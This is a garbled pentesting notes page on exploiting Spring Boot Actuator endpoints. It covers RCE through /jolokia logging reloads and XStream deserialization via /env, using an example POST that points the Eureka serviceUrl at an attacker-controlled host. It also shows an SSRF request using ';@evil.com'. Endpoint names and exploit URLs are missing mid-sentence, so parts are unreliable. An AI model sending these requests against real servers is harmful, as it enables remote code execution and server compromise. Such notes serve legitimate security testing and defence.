Spring Actuators
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Spring Auth Bypass
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Exploiting Spring Boot Actuators
Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Key Points:
- Spring Boot Actuators register endpoints such as
, etc. In versions 1 to 1.4, these endpoints are accessible without authentication. From version 1.5 onwards, only/health
are non-sensitive by default, but developers often disable this security. - Certain Actuator endpoints can expose sensitive data or allow harmful actions:
, and/heapdump
- In Spring Boot 1.x, actuators are registered under the root URL, while in 2.x, they are under the
base path.
Exploitation Techniques:
Remote Code Execution via '/jolokia':
- The
actuator endpoint exposes the Jolokia Library, which allows HTTP access to MBeans. - The
action can be exploited to reload logging configurations from an external URL, which can lead to blind XXE or Remote Code Execution via crafted XML configurations. - Example exploit URL:
- The
Config Modification via '/env':
If Spring Cloud Libraries are present, the
endpoint allows modification of environmental properties. -
Properties can be manipulated to exploit vulnerabilities, such as the XStream deserialization vulnerability in the Eureka serviceURL.
Example exploit POST request:
POST /env HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 65 eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
Other Useful Settings:
- Properties like
, andspring.datasource.tomcat.max-active
can be manipulated for various exploits, such as SQL injection or altering database connection strings.
- Properties like
Additional Information:
- A comprehensive list of default actuators can be found here.
- The
endpoint in Spring Boot 2.x uses JSON format for property modification, but the general concept remains the same.
Related Topics:
Env + H2 RCE:
- Details on exploiting the combination of
endpoint and H2 database can be found here.
- Details on exploiting the combination of
SSRF on Spring Boot Through Incorrect Pathname Interpretation:
- The Spring framework's handling of matrix parameters (
) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF). - Example exploit request:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
> [!TIP]
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